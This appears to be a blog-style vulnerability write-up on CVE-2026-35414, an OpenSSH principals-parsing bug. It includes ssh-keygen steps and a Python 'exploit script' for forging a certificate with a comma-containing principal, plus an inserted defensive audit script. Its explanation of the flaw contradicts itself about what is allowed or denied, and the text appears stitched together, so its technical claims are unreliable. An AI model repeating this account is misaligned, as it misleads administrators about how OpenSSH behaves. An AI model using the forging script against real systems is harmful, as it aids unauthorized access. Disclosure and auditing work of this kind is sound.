CVE-2026-35414 is a newly disclosed vulnerability affecting OpenSSH versions prior to 10.3. This flaw opens the door to unexpected access due to the way OpenSSH mishandles the principals option in the authorized_keys file. The bug centers around uncommon setups: when the principals list is used alongside Certificate Authority (CA) keys that have principal names containing special characters like commas.

In this article, we’ll break down the vulnerability, provide technical examples, show possible exploitation, and share references for further exploration.

What is the principals Option in OpenSSH?

OpenSSH’s authorized_keys file lets you attach options to each public key it lists. The principals option restricts which principal names a certificate must carry for authentication to succeed. Most deployments never use it, but in larger environments that rely on SSH certificate authentication it is common.

A simple line in authorized_keys might look like this:

cert-authority,principals="bob,alice" ssh-rsa AAAAB3Nza...CA...

This means only certificates valid for "bob" or "alice" (according to the CA) can authenticate.

The Vulnerability: Mishandling Comma Characters

The problem arises when principal names themselves include commas — for example, bob,admin. Prior to 10.3, OpenSSH doesn’t correctly parse these cases, which can easily occur with custom CA software or during automation. As a result, certificates sometimes get granted access they shouldn’t, or are denied incorrectly.

The intention: allow users holding either the bob or the admin principal.

What actually happens: OpenSSH interprets the principals list as the single principal bob,admin and not as two separate principals. If the CA certificate actually grants the principal bob,admin (which is rare), access is granted.

If a certificate has principals like bob or admin (separately), it gets denied access even though it should be allowed.

Conversely, a poorly constructed CA could accidentally assign bob,admin as a principal, which the server matches, even though the expectation was to allow either bob or admin separately.

In a real-world setup, an attacker could leverage this in the following ways:

1. Bypassing Authorization: If an attacker can persuade a CA admin to issue a certificate with a principal string containing a comma ("bob,admin"), they could gain unauthorized access under conditions where only "bob" or "admin" should be allowed.
2. Denial of Legitimate Access: If legitimate users have principals "bob" and want access, but the authorized_keys configuration expects "bob,admin", their authentication fails, causing confusion and potentially locking users out.

Step 1: Generating a CA Key

ssh-keygen -t rsa -b 4096 -f ca_key

Step 2: Signing a User Key With a Comma Principal

ssh-keygen -s ca_key -I id_bob -n "bob,admin" id_rsa.pub

Here, -n specifies the certificate’s principals. We’re assigning a single principal with a comma in the string.

On the server, place this in /home/targetuser/.ssh/authorized_keys:

cert-authority,principals="bob,admin" ssh-rsa AAAAB3... (CA public key)

*But*, if you log in with a cert holding just the single principal "bob,admin", *it succeeds*.

This misalignment is the *core* of CVE-2026-35414.

Exploit Script Example (Python)

Here’s a snippet that can automate the forging of such a certificate for attack purposes if one possesses CA key access (or the CA is mismanaged):

import subprocess

def create_forged_cert(ca_key, user_pubkey, principal):
    # Sign user_pubkey with the CA key, assigning the given principal string.
    # check=True raises if ssh-keygen fails (e.g. wrong CA path or passphrase).
    subprocess.run([
        'ssh-keygen', '-s', ca_key, '-I', 'exploit_id',
        '-n', principal, user_pubkey
    ], check=True)

# Parameters
ca_key = 'ca_key'
user_pubkey = 'attacker_id_rsa.pub'
principal = 'bob,admin'  # single principal containing a comma

create_forged_cert(ca_key, user_pubkey, principal)

With this, an attacker (with limited CA privileges or through social engineering) could generate a certificate that would slip through misconfigured checks.

Fix and Mitigation

Upgrade OpenSSH to at least version 10.3, where this bug is fixed and parsing is corrected.

If you’re stuck on an older OpenSSH, do not use commas within principal names, and carefully audit all principal definitions to ensure they’re unambiguous.
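As an added example (not code from the original article or from the OpenSSH project), here is a small audit script for the advice above: it parses the options field of each authorized_keys line the way sshd does (quoted values may contain commas and \" escapes) and reports cert-authority entries whose principals value contains a comma, or a name outside a conservative character set, so an administrator can confirm each one is intended. The sample file, the placeholder key blobs and the SAFE_PRINCIPAL character set are constructed assumptions.

```python
import re
# Assumed conservative charset for principal names; adjust to local policy.
SAFE_PRINCIPAL = re.compile(r"^[A-Za-z0-9._@-]+$")
KEY_TYPE_PREFIXES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-", "sk-")
# One option: name, optionally ="quoted" (commas and \" allowed) or =bare value.
OPTION_RE = re.compile(r'([^,=\s]+)(?:=(?:"((?:\\.|[^"\\])*)"|([^,]*)))?(?:,|$)')

def options_field(line):
    # The options field ends at the first whitespace outside double quotes.
    if line.startswith(KEY_TYPE_PREFIXES):
        return ""  # line starts with the key type, so it carries no options
    quoted = False
    for i, ch in enumerate(line):
        if ch == '"' and (i == 0 or line[i - 1] != "\\"):
            quoted = not quoted
        elif ch in " \t" and not quoted:
            return line[:i]
    return line

def parse_options(field):
    # 'a,b="x,y",c' -> [('a', None), ('b', 'x,y'), ('c', None)]
    opts = []
    for m in OPTION_RE.finditer(field):
        name, quoted, bare = m.groups()
        opts.append((name, quoted.replace('\\"', '"') if quoted is not None else bare))
    return opts

def audit_authorized_keys(text):
    # (line_no, reason, value) for cert-authority entries needing review.
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        opts = dict(parse_options(options_field(line)))
        value = opts.get("principals")
        if "cert-authority" not in opts or value is None:
            continue
        if "," in value:
            findings.append((lineno, "comma in principals value", value))
        for name in value.split(","):
            if not SAFE_PRINCIPAL.match(name):
                findings.append((lineno, "unusual principal name", name))
    return findings

# Constructed sample (not from a real host); key blobs are placeholders.
SAMPLE = """\
# deployment CA
cert-authority,principals="bob,admin" ssh-ed25519 AAAAC3PLACEHOLDER ca@example
ssh-ed25519 AAAAC3PLACEHOLDER plain-key@example
cert-authority,principals="svc;backup" ssh-rsa AAAAB3PLACEHOLDER ca2@example
"""
```

Run it against a real file with `audit_authorized_keys(open(path).read())` and review every finding by hand; a comma finding is exactly the pattern this article says to avoid on pre-10.3 servers.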

References

- OpenSSH ChangeLog
- OpenSSH Certificate Authentication
- CERT Coordination Center on SSH Certificates

There isn’t an official NVD link yet for CVE-2026-35414 as it’s quite new. Stay up-to-date on cve.mitre.org.

Conclusion

CVE-2026-35414 underlines how subtle configuration and parsing bugs in security software like OpenSSH can have outsized impact when rare options or edge cases are in use. If your setup relies on OpenSSH with SSH certificate authentication and the principals restriction, review your keys and upgrade as soon as possible.

Timeline

Published on: 04/02/2026 17:08:15 UTC
Last modified on: 04/03/2026 19:39:03 UTC